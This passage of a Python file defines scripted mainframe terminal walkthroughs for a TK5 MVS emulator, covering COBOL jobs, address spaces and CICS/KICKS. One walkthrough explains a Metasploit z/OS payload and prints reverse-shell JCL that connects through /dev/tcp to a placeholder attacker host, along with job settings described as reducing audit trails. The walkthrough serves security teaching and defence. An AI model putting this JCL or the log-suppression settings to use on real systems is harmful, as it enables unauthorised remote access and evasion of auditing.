                    {"type": "string", "value": "       PROGRAM-ID. HELLO."},
                    {"type": "enter"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "       PROCEDURE DIVISION."},
                    {"type": "enter"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "           DISPLAY 'HELLO FROM HERC01'."},
                    {"type": "enter"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "           STOP RUN."},
                    {"type": "enter"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "SAVE"},
                    {"type": "enter"}, {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "END"},
                    {"type": "enter"}, {"type": "wait", "seconds": 2},
                ],
                "expect": ["EDIT", "SAVED", "READY", "END"],
                "display_seconds": 10,
            },
            {
                "title": "Write JCL — Compile-Link-Go Job",
                "control_plane": "jes",
                "narration": "**Writing JCL for the compile-link-go workflow**\n\nWe allocate a JCL PDS and write a job that:\n1. **COB step** — Compiles our COBOL source using `IKFCBL00`\n2. **LKED step** — Links the object code with `SYS1.COBLIB`\n3. **GO step** — Executes the linked program\n\nThe `COBUCG` cataloged procedure handles all three steps. We override `SYSIN` to point to our source member.\n\n**Trust chain:** HERC01 submits → JES queues → compiler reads our source → linker loads from `SYS1.COBLIB` → GO step runs under HERC01's identity.\n\nEvery step is governed by RACF authority checks.",
                "actions": [
                    {"type": "string", "value": "ALLOC DA('HERC01.COBOL.JCL') NEW SPACE(5,5) TRACKS DIR(5) RECFM(F,B) LRECL(80) BLKSIZE(3200)"},
                    {"type": "enter"}, {"type": "wait", "seconds": 3},
                    {"type": "string", "value": "EDIT 'HERC01.COBOL.JCL(RUNCOB)' DATA NONUM"},
                    {"type": "enter"}, {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "//RUNCOB  JOB (ACCT),'COBOL RUN',CLASS=A,MSGCLASS=A,MSGLEVEL=(1,1)"},
                    {"type": "enter"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "//COB    EXEC COBUCG"},
                    {"type": "enter"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "//COB.SYSIN DD DSN=HERC01.COBOL.SOURCE(HELLO),DISP=SHR"},
                    {"type": "enter"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "SAVE"},
                    {"type": "enter"}, {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "END"},
                    {"type": "enter"}, {"type": "wait", "seconds": 2},
                ],
                "expect": ["SAVED", "READY", "END"],
                "display_seconds": 10,
            },
            {
                "title": "Submit the Job",
                "control_plane": "jes",
                "narration": "**Submitting to JES — Deferred Execution**\n\nThe `SUBMIT` command sends our JCL to JES2 for scheduling.\n\n**What happens:**\n1. JES reads the JCL\n2. Allocates datasets for each DD statement\n3. Queues the job for execution\n4. Runs COB → LKED → GO steps sequentially\n5. Captures all output to the spool\n\n**Identity binding:** The job runs under HERC01's identity — the submitter. RACF checks at every stage: can HERC01 read the source? Execute the compiler? Access `SYS1.COBLIB`?\n\n**This is the deferred execution model.** The job may run seconds or hours after submission.",
                "actions": [
                    {"type": "string", "value": "SUBMIT 'HERC01.COBOL.JCL(RUNCOB)'"},
                    {"type": "enter"}, {"type": "wait", "seconds": 5},
                ],
                "expect": ["SUBMITTED", "JOB", "IKJ"],
                "display_seconds": 8,
            },
            {
                "title": "View Job Output",
                "control_plane": "jes",
                "narration": "**Checking execution results**\n\nWe use `OUTPUT` to retrieve job output from the JES spool.\n\n**What to look for:**\n- **RC=0000** on each step — success\n- **HELLO FROM HERC01** in GO step output — our DISPLAY verb executed\n- **Compiler listing** — shows COBOL translated to machine code\n\n**Trust verification:** The output proves:\n- User-written source was compiled\n- User-submitted JCL controlled the execution workflow\n- Output is bound to the submitter's identity\n\nThis is the complete deferred execution chain: source → JCL → JES → compile → link → execute → spool.",
                "actions": [
                    {"type": "wait", "seconds": 5},
                    {"type": "string", "value": "OUTPUT"},
                    {"type": "enter"}, {"type": "wait", "seconds": 3},
                    {"type": "enter"}, {"type": "wait", "seconds": 2},
                    {"type": "enter"}, {"type": "wait", "seconds": 2},
                ],
                "expect": ["OUTPUT", "READY", "HELLO", "RUNCOB"],
                "display_seconds": 8,
            },
            {
                "title": "Logoff — Clean Exit",
                "control_plane": "vtam",
                "narration": "**Summary: COBOL Development on MVS**\n\n**What we did:**\n1. Allocated a PDS — created storage under our identity\n2. Wrote COBOL source — stored in a PDS member\n3. Wrote JCL — declared the compile-link-go workflow\n4. Submitted to JES — deferred execution under our identity\n5. Verified output — our DISPLAY text appeared in the spool\n\n**The execution trust chain:**\nHERC01 → SUBMIT → JES queue → COB compiler → LKED linker → GO execution → spool output\n\nEvery step ran under HERC01's authority. RACF governed access at each boundary.\n\n**Mental model shift:** On Unix: `gcc hello.c && ./a.out` — immediate, ephemeral. On MVS: Declare → Queue → Schedule → Execute → Preserve. The compile job is now part of the permanent audit record.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM"],
                "display_seconds": 10,
            },
        ],
    },
    "address-spaces": {
        "title": "Address Space Anatomy: What's Running",
        "steps": [
            {
                "title": "Connect & Login",
                "control_plane": "tso",
                "narration": "**Setup: Establishing Identity**\n\nWe connect and log in to TSO. This walkthrough examines address spaces — the MVS equivalent of processes. Unlike Unix processes, address spaces are persistent and identity-bound.",
                "actions": [
                    {"type": "connect"},
                    {"type": "wait", "seconds": 2},
                    {"type": "tso_login"},
                ],
                "expect": ["READY", "ISPF", "IKJ", "RFE", "TSOAPPLS"],
                "display_seconds": 4,
            },
            {
                "title": "STATUS — Active Jobs & Sessions",
                "control_plane": "jes",
                "narration": "**Control Plane: JES (System Activity)**\n\nWe exit the TSO Applications Menu (PF3) to reach the TSO READY prompt, then run `STATUS`. On TK5 MVS 3.8j, there is no SDSF — we use TSO commands to inspect the system.\n\n**Key concept:** `STATUS` is the MVS 3.8j equivalent of `ps` — but it shows *address spaces*, not processes. These may have been running since IPL.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "STATUS"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["STATUS", "JOB", "HERC", "EXECUTING", "READY"],
                "display_seconds": 6,
            },
            {
                "title": "LISTALC — Address Space Allocations",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (Address Space Resources)**\n\nThe `LISTALC STATUS` command shows every dataset allocated to this address space. These allocations reveal what resources are bound to your session.\n\n**Broken Assumption:** *\"Processes are short-lived.\"* This TSO address space persists. Its dataset allocations were established at logon and remain for the session lifetime.\n\n**Key concept:** Each address space has an identity bound at startup time. The allocations show the resource footprint of that identity.",
                "actions": [
                    {"type": "string", "value": "LISTALC STATUS"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["LISTALC", "SYS1", "KEEP", "STEPLIB"],
                "display_seconds": 7,
            },
            {
                "title": "OUTPUT — Completed Job Results",
                "control_plane": "jes",
                "narration": "**Control Plane: JES (Deferred Execution)**\n\nThe TSO `OUTPUT` command shows output from completed jobs. Each job preserves the identity of its submitter.\n\n**Broken Assumption:** *\"Work executes immediately.\"* The gap between submission and execution is a security-relevant window. JES preserves the audit trail.",
                "actions": [
                    {"type": "string", "value": "OUTPUT"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["OUTPUT", "READY", "NO OUTPUT"],
                "display_seconds": 6,
            },
            {
                "title": "LISTCAT — System Catalog",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO (System Discovery)**\n\n`LISTCAT` shows catalog entries — the namespace of all datasets on the system. The catalog maps names to physical DASD volumes.\n\n**Key concept:** Look for system datasets (SYS1.*), user datasets (HERC01.*), and product datasets (SYS2.*). Each has RACF profiles controlling access. ICH messages in the system log record every authorization decision.",
                "actions": [
                    {"type": "string", "value": "LISTCAT ENT('SYS1.PARMLIB')"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["LISTCAT", "SYS1", "PARMLIB", "NONVSAM"],
                "display_seconds": 7,
            },
            {
                "title": "Logoff",
                "control_plane": "vtam",
                "narration": "**Summary: Address Space Anatomy**\n\n1. **Address spaces, not processes:** MVS runs persistent address spaces\n2. **Identity is bound at startup:** Each address space carries the identity of its creator\n3. **Deferred execution:** Jobs wait in queues before running\n4. **TSO commands for inspection:** STATUS, LISTALC, OUTPUT, LISTCAT\n5. **No SDSF on MVS 3.8j:** Use TSO commands and the Hercules console for system visibility\n\n**Warning:** Never disconnect the terminal while logged in \u2014 it locks the userid. Recover with `/C U=userid` at the Hercules console.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM"],
                "display_seconds": 8,
            },
        ],
    },
    "reverse-shell": {
        "title": "Z/OS Reverse Shell: JCL as Attack Vector (Metasploit)",
        "steps": [
            {
                "title": "Connect to Mainframe",
                "control_plane": "vtam",
                "narration": "**Metasploit Payload: cmd/mainframe/reverse_shell_jcl**\n\nThis walkthrough demonstrates how the Metasploit Z/OS reverse shell payload works by walking through the JCL creation and submission process on a live mainframe.\n\n**Key insight:** On Z/OS, the 'payload' is not a binary — it's JCL text. The 'architecture' is `cmd` because JCL is a command language processed by JES2. This is fundamentally different from every Unix/Windows payload.\n\n**F5 — Imported Assumption:** 'Payloads are binaries.' On Z/OS, the payload is JCL.",
                "actions": [{"type": "connect"}],
                "expect": ["VTAM", "Logon", "TK5", "MVS"],
                "display_seconds": 6,
            },
            {
                "title": "TSO Login — Identity Binding",
                "control_plane": "tso",
                "narration": "**F1 — Identity Binding at the JOB Card**\n\nLogging in as HERC01. On a real Z/OS system, the Metasploit payload generates JCL with a JOB card that carries the submitter's identity:\n\n```\n//REVSHELL JOB (MSFUSER-ACCTING-INFO),'programmer name',\n//             CLASS=A,MSGCLASS=Z,MSGLEVEL=(0,0)\n```\n\n**MSGCLASS=Z** suppresses output. **MSGLEVEL=(0,0)** minimizes logging. These are anti-forensic choices — they reduce the audit trail in JES2.\n\nThe identity bound here (HERC01) will govern everything the reverse shell can access.\n\n**Your listener:** `{{LHOST}}:{{LPORT}}`",
                "actions": [{"type": "tso_login"}],
                "expect": ["READY", "ISPF", "RFE", "TSOAPPLS"],
                "display_seconds": 8,
            },
            {
                "title": "Browse Existing JCL Library",
                "control_plane": "jes",
                "narration": "**Control Plane: JES (Job Declaration)**\n\nWe enter RFE and browse `SYS2.JCLLIB` — the JCL library. On a real engagement, an attacker would create a new PDS member containing the reverse shell JCL.\n\nThe Metasploit `reverse_shell_jcl` payload generates complete JCL that:\n1. Declares a JOB with anti-forensic parameters\n2. Executes BPXBATCH to bridge MVS batch → Unix System Services\n3. Spawns `/bin/sh` with a TCP reverse connection\n\n**On MVS 3.8j (TK5):** There is no USS/BPXBATCH — this is a pre-Unix mainframe. But the JCL submission model is identical. We'll examine the JCL structure that makes this attack possible.",
                "actions": [
                    {"type": "enter_rfe"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "1"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                    {"type": "home"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "string", "value": "SYS2"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "string", "value": "JCLLIB"}, {"type": "tab"},
                    {"type": "eraseeof"}, {"type": "tab"},
                    {"type": "eraseeof"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["SYS2", "JCLLIB", "MEMBER", "NAME"],
                "display_seconds": 7,
            },
            {
                "title": "Examine JCL Job Structure",
                "control_plane": "jes",
                "narration": "**Anatomy of the Metasploit Reverse Shell JCL**\n\nThe generated JCL looks like this (on modern Z/OS with USS):\n\n```jcl\n//REVSHELL JOB (MSFUSER-ACCTING-INFO),'programmer name',\n//             CLASS=A,MSGCLASS=Z,MSGLEVEL=(0,0)\n//*\n//STEP1 EXEC PGM=BPXBATCH,\n//          PARM='sh -c exec 3<>/dev/tcp/{{LHOST}}/{{LPORT}};'\n//STDOUT DD SYSOUT=Z\n//STDERR DD SYSOUT=Z\n```\n\n**JOB card options (all configurable in Metasploit):**\n- `ACTNUM` — Accounting info (tracks resource usage)\n- `JCLASS=A` — Job class (determines execution priority)\n- `MSGCLASS=Z` — Output class (Z = suppress/discard)\n- `MSGLEVEL=(0,0)` — Minimal JES messages (anti-forensic)\n- `PGMNAME` — Programmer name (can be spoofed)\n\nEvery one of these is a Metasploit module option.",
                "actions": [
                    {"type": "wait", "seconds": 5},
                ],
                "expect": ["MEMBER", "NAME", "JCL"],
                "display_seconds": 10,
            },
            {
                "title": "View a Real JCL Job — Identity in Action",
                "control_plane": "jes",
                "narration": "**F2 — Authority Evaluated at Submission**\n\nLet's look at a real JCL job on this system. Every job in `SYS2.JCLLIB` follows the same pattern the Metasploit payload uses:\n\n1. **JOB card** — Identity binding (who submitted it)\n2. **EXEC statement** — What program to run\n3. **DD statements** — What datasets to access\n\n**Critical insight:** RACF evaluates authority at **submission time**. If HERC01 submits a job, every dataset access and program execution in that job runs under HERC01's RACF profile — even if HERC01 logs off before the job runs.\n\nThis is **deferred execution** (F3) — submit now, run later, under the original identity.",
                "actions": [
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["JOB", "EXEC", "DD"],
                "display_seconds": 8,
            },
            {
                "title": "Return to TSO — Check STATUS",
                "control_plane": "jes",
                "narration": "**F3 — Deferred Execution via JES2**\n\nReturning to TSO to check active jobs with `STATUS`. On a real Z/OS system, the reverse shell JCL would be:\n\n1. **Submitted** to JES2 input queue\n2. **Queued** until a JES2 initiator picks it up\n3. **Scheduled** based on job class priority\n4. **Executed** under the submitter's RACF identity\n5. **BPXBATCH** bridges to Unix System Services\n6. **Shell spawns** with TCP reverse connection to `{{LHOST}}:{{LPORT}}`\n\nThe attacker doesn't need to be connected when the shell spawns. The gap between submission and execution is the vulnerability window.\n\n**On real Z/OS:** `msf6> set LHOST {{LHOST}}` / `set LPORT {{LPORT}}`\n\n**On TK5:** We use `STATUS` instead of SDSF to see active jobs.",
                "actions": [
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "pf", "value": "3"},
                    {"type": "wait", "seconds": 2},
                    {"type": "string", "value": "STATUS"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["STATUS", "JOB", "EXECUTING", "READY"],
                "display_seconds": 7,
            },
            {
                "title": "LISTCAT — Dataset Access Under Submitter Identity",
                "control_plane": "racf",
                "narration": "**F4 — Policy Enforcement Across Control Planes**\n\nUsing `LISTCAT` to show catalog entries. On a real Z/OS system, the reverse shell runs under the submitter's identity and can access:\n\n- Any dataset the submitter has READ access to\n- Any program in STEPLIB/LINKLIB\n- USS filesystem under the submitter's UID\n\n**Defense layers that should block this:**\n\n1. **RACF FACILITY class** — `BPX.SPAWN` controls who can use BPXBATCH\n2. **RACF SURROGAT class** — Controls job submission as other users\n3. **JES2 JOBCLASS profiles** — Restricts which classes users can submit to\n4. **SMF Type 30/80/83** — Audit records for job activity and RACF decisions\n\nThe real finding isn't 'reverse shells exist on Z/OS.' It's 'which of these control planes is actually configured to block it?'",
                "actions": [
                    {"type": "string", "value": "LISTCAT ENT('SYS1.LINKLIB')"},
                    {"type": "enter"},
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["LISTCAT", "SYS1", "LINKLIB", "NONVSAM"],
                "display_seconds": 8,
            },
            {
                "title": "EBCDIC Translation Gap",
                "control_plane": "racf",
                "narration": "**F5 — Imported Assumptions Break Here**\n\nThe Metasploit payload description says:\n\n> *'This implementation does not include EBCDIC character translation, so a client with translation capabilities is required.'*\n\nZ/OS uses **EBCDIC**, not ASCII. A raw TCP reverse shell produces EBCDIC output:\n\n```\nASCII:  ls -la  → 6C 73 20 2D 6C 61\nEBCDIC: ls -la  → 93 A2 40 60 93 81\n```\n\nWithout translation, the attacker sees garbled output. Metasploit handles this automatically in its session handler.\n\n**This is the deepest imported assumption:** Every Unix/Windows tool assumes ASCII. On Z/OS, even the character encoding is different. Tools designed for one world fail silently in the other.\n\nThe terminal you're looking at right now is doing EBCDIC↔ASCII translation via the TN3270 protocol. It's invisible — and that invisibility is the problem.",
                "actions": [
                    {"type": "wait", "seconds": 3},
                ],
                "expect": [],
                "display_seconds": 10,
            },
            {
                "title": "Trust Boundary Summary",
                "control_plane": "racf",
                "narration": "**Complete Trust Flow: Metasploit reverse_shell_jcl**\n\n```\n[Attacker @ {{LHOST}}] ──submit──▶ [JES2 Queue]\n                          │\n                    (deferred)\n                          │\n                    [JES2 Initiator]\n                          │\n                 identity: submitter\n                          │\n                    [BPXBATCH]\n                          │\n                 MVS ──▶ USS boundary\n                          │\n                    [/bin/sh]\n                          │\n                    [TCP connect]\n                          │\n[Attacker] ◀──shell──  [{{LHOST}}:{{LPORT}}]\n```\n\n**All five findings areas in one payload:**\n- **F1:** Identity bound at JOB card (submitter)\n- **F2:** Authority evaluated by RACF at each step\n- **F3:** Deferred execution via JES2 queue\n- **F4:** Policy split across RACF + JES2 + USS\n- **F5:** Assumes ASCII, assumes immediate execution\n\n**CFP thesis:** Mainframes make trust boundaries explicit. You can trace identity from submission through deferred execution to shell access. On Unix, these boundaries are implicit and invisible.",
                "actions": [
                    {"type": "wait", "seconds": 3},
                ],
                "expect": [],
                "display_seconds": 12,
            },
            {
                "title": "Logoff — Clean Exit",
                "control_plane": "vtam",
                "narration": "**Walkthrough Complete**\n\nYou've seen how the Metasploit `cmd/mainframe/reverse_shell_jcl` payload maps to the trust boundary model:\n\n1. **JCL is the payload** — not a binary, not shellcode\n2. **JES2 is the execution engine** — deferred, queued, scheduled\n3. **RACF governs access** — but only if configured correctly\n4. **EBCDIC breaks assumptions** — tools designed for ASCII fail\n5. **Identity persists** — submitter's authority governs execution\n\n**The real vulnerability is not the reverse shell. It's the gap between 'RACF exists' and 'RACF is configured to block BPXBATCH abuse.'**\n\nThis is why the trust boundary assessment model matters.\n\n**Warning:** Never disconnect the terminal while logged in — it locks the userid. Recover with `/C U=userid` at the Hercules console.",
                "actions": [{"type": "tso_logoff"}],
                "expect": ["LOGOFF", "VTAM"],
                "display_seconds": 10,
            },
        ],
    },
}

# CICS/KICKS walkthrough definition (placed in WALKTHROUGH_SCRIPTS above)
WALKTHROUGH_SCRIPTS["cics-kicks"] = {
    "title": "CICS/KICKS: Transaction Processing",
    "steps": [
            {
                "title": "Connect to Mainframe",
                "control_plane": "vtam",
                "narration": "**Control Plane: VTAM (Session Fabric)**\n\nConnecting to MVS TK5. KICKS is a CICS-compatible transaction processing system that runs under TSO.",
                "actions": [{"type": "connect"}],
                "expect": ["VTAM", "Logon", "TK5", "MVS"],
                "display_seconds": 3,
            },
            {
                "title": "TSO Login",
                "control_plane": "tso",
                "narration": "**Control Plane: TSO / RACF**\n\nLogging in as HERC01. KICKS runs as a TSO application, unlike IBM CICS which runs as a started task.",
                "actions": [{"type": "tso_login"}],
                "expect": ["READY", "ISPF", "RFE", "TSOAPPLS"],
                "display_seconds": 4,
            },
            {
                "title": "Exit to TSO READY",
                "control_plane": "tso",
                "narration": "**Preparing for KICKS**\n\nExiting ISPF to reach TSO READY prompt where we can start KICKS.",
                "actions": [
                    {"type": "pf", "value": "3"}, {"type": "wait", "seconds": 2},
                ],
                "expect": ["READY"],
                "display_seconds": 3,
            },
            {
                "title": "Start KICKS",
                "control_plane": "cics",
                "narration": "**Control Plane: CICS (Transaction Processing)**\n\nStarting KICKS with the EXEC command. KICKS provides CICS-compatible transaction processing:\n\n- **Transaction IDs** — 4-character codes that invoke programs\n- **BMS Maps** — Screen definitions for 3270 terminals\n- **VSAM Files** — Data storage for transactions\n- **Pseudo-conversational** — Programs end after each screen, freeing resources\n\nKICKS is source-compatible with IBM CICS — programs can migrate between them.",
                "actions": [
                    {"type": "string", "value": "EXEC 'KICKS.KICKSSYS.V1R5M0.CLIST(KICKS)'"}, 
                    {"type": "enter"}, 
                    {"type": "wait", "seconds": 5},
                ],
                "expect": ["KICKS", "KSGM", "transaction"],
                "display_seconds": 6,
            },
            {
                "title": "KICKS Banner Screen",
                "control_plane": "cics",
                "narration": "**KICKS is running!**\n\nThe KICKS banner shows the system is active. Key transactions:\n\n- **KSGM** — Good morning (startup screen)\n- **MENU** — Application menu\n- **INQ1** — Customer inquiry\n- **MNT1** — Customer maintenance\n- **KSSF** — Sign off (shutdown)\n\nPress CLEAR then type a transaction ID to execute it.",
                "actions": [{"type": "enter"}, {"type": "wait", "seconds": 3}],
                "expect": ["KICKS", "KSGM"],
                "display_seconds": 6,
            },
            {
                "title": "Run MENU Transaction",
                "control_plane": "cics",
                "narration": "**Running a CICS Transaction**\n\nClearing screen and entering MENU to see available applications. Each transaction:\n\n1. Receives terminal input\n2. Executes a COBOL/Assembler program\n3. Sends output to terminal\n4. Ends (pseudo-conversational)\n\nThis is fundamentally different from batch — transactions are interactive and immediate.",
                "actions": [
                    {"type": "clear"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "MENU"}, 
                    {"type": "enter"}, 
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["MENU", "CUSTOMER", "ORDER", "application"],
                "display_seconds": 5,
            },
            {
                "title": "Sign Off KICKS",
                "control_plane": "cics",
                "narration": "**Clean CICS Exit**\n\nSigning off with KSSF transaction. This cleanly terminates the KICKS region and returns to TSO.\n\n**Key CICS Concepts Demonstrated:**\n- Transaction processing (not batch)\n- Pseudo-conversational design\n- BMS screen handling\n- Program-to-transaction mapping",
                "actions": [
                    {"type": "clear"}, {"type": "wait", "seconds": 1},
                    {"type": "string", "value": "KSSF"}, 
                    {"type": "enter"}, 
                    {"type": "wait", "seconds": 3},
                ],
                "expect": ["SIGNOFF", "READY", "ended"],
                "display_seconds": 5,
            },
            {
                "title": "Return to TSO",
                "control_plane": "tso",
                "narration": "**Back at TSO READY**\n\nKICKS has terminated. You've seen:\n\n- **VTAM** — Session fabric\n- **TSO** — Interactive environment hosting KICKS\n- **CICS/KICKS** — Transaction processing layer\n\nCICS is how most real-time mainframe applications work — banking, retail, airlines all use CICS transactions.",
                "actions": [{"type": "enter"}, {"type": "wait", "seconds": 2}],
                "expect": ["READY"],
                "display_seconds": 5,
            },
    ],
}
